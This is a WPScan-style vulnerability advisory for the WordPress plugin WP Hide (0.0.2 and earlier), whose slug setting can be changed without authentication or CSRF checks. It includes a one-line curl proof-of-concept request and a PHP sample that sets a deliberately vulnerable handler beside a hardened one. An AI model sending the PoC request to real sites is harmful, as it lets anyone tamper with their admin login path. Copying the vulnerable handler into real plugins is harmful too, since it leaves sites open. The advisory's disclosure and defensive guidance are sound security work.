wpvulndb | Daniel Ruf | WPVDB-ID: 36D78B6C-0DA5-44F8-B7B3-EAE78EDAC505
History: Oct 17, 2022 - 12:00 a.m.

WP Hide <= 0.0.2 - Unauthenticated Settings Update

Published: 2022-10-17 00:00:00
Author: Daniel Ruf
Source: wpscan.com
Tags: wordpress, unauthenticated, csrf

EPSS: 0.001 (Low), Percentile: 39.6%

The plugin does not have authorisation and CSRF checks in place when updating the custom_wpadmin_slug setting, allowing unauthenticated attackers to change it with a crafted request.

PoC

curl -X POST --data "custom_wpadmin_slug=attacker-value" https://example.com/wp-admin/admin-post.php

The updated setting is displayed in Settings > Permalinks.
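The root cause described above is a settings handler that accepts the POST without checking who sent it or whether the request originated from the plugin's own form. The following is an added example written for this page, not the WP Hide plugin's actual code; all function, hook and option names (example_…) are hypothetical. It shows the vulnerable shape (an admin_init handler that writes $_POST straight into an option, which admin-post.php triggers even for anonymous requests) beside a hardened admin-post handler that adds the two missing checks, authorisation via current_user_can() and CSRF protection via a nonce, plus input validation.

```php
<?php
/*
 * Added example (not the WP Hide plugin's own code): a settings-update handler
 * for a custom_wpadmin_slug option, vulnerable shape beside hardened shape.
 * All example_* names and the option key are hypothetical.
 */

// VULNERABLE SHAPE: admin_init fires on every request to admin-post.php,
// including unauthenticated ones. Reading $_POST here with no capability
// check and no nonce means any crafted POST can overwrite the option.
function example_vuln_save_slug() {
    if ( isset( $_POST['custom_wpadmin_slug'] ) ) {
        update_option( 'example_custom_wpadmin_slug', $_POST['custom_wpadmin_slug'] );
    }
}
// add_action( 'admin_init', 'example_vuln_save_slug' ); // not registered on purpose

// HARDENED SHAPE: the settings form posts a named action plus a nonce bound to
// that action; only a logged-in, capable user with a valid nonce reaches update_option().
function example_render_slug_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="example_save_wpadmin_slug">
        <?php wp_nonce_field( 'example_save_wpadmin_slug', 'example_slug_nonce' ); ?>
        <input type="text" name="custom_wpadmin_slug"
               value="<?php echo esc_attr( get_option( 'example_custom_wpadmin_slug', '' ) ); ?>">
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}

function example_save_wpadmin_slug() {
    // 1. Authorisation: the request must come from a user allowed to manage site options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You are not allowed to change this setting.', '', array( 'response' => 403 ) );
    }

    // 2. CSRF: the nonce must have been issued for this exact action;
    //    check_admin_referer() terminates the request if it is missing or invalid.
    check_admin_referer( 'example_save_wpadmin_slug', 'example_slug_nonce' );

    // 3. Validation: normalise to a URL-safe slug and refuse an empty result
    //    so a junk value cannot lock administrators out of the login path.
    $raw  = isset( $_POST['custom_wpadmin_slug'] ) ? wp_unslash( $_POST['custom_wpadmin_slug'] ) : '';
    $slug = sanitize_title( $raw );
    if ( '' === $slug ) {
        wp_die( 'Invalid slug.', '', array( 'response' => 400 ) );
    }

    update_option( 'example_custom_wpadmin_slug', $slug );
    wp_safe_redirect( admin_url( 'options-permalink.php?example_slug_saved=1' ) );
    exit;
}

// Only the logged-in variant of the admin-post hook is registered. Because there is
// no admin_post_nopriv_example_save_wpadmin_slug hook, an anonymous POST to
// admin-post.php finds no handler at all, regardless of the form fields it carries.
add_action( 'admin_post_example_save_wpadmin_slug', 'example_save_wpadmin_slug' );
```

Both checks are needed: the capability check alone still lets a logged-in administrator be tricked into submitting the form from another site (CSRF), and the nonce alone does not prove the submitter is allowed to change the option, since any logged-in user can obtain a nonce for their own session. When reviewing a plugin for this class of issue, look for update_option() calls reachable from admin_init, init or admin_post_nopriv_* hooks that are not preceded by both current_user_can() and check_admin_referer() (or wp_verify_nonce()).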

CPE Name    Operator    Version
wp-hide     eq          *

